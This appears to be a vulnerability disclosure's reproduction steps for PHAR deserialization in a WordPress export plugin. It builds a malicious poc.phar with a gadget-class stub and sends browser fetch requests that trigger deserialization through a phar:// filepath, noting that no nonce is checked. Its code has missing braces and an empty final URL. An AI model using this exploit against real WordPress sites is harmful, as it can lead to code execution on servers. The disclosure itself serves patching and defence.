1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and add it to the root directory of the server:


class Evil {}

    $pharFile = 'poc.phar';

    if (file_exists($pharFile))

    $phar = new Phar($pharFile);

        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );

    echo "$pharFile successfully created" . PHP_EOL;
catch (Exception $e)
    echo $e->getMessage();

3. Add the following code to the server to simulate a gadget:

class Evil {
 function __wakeup() {
  die('Arbitrary deserialization');

4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.

await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    "method": "POST",
    "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
    "mode": "cors",

5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.

await fetch("", {
    "credentials": "include",
    "headers": {},
    "method": "GET",
    "mode": "cors",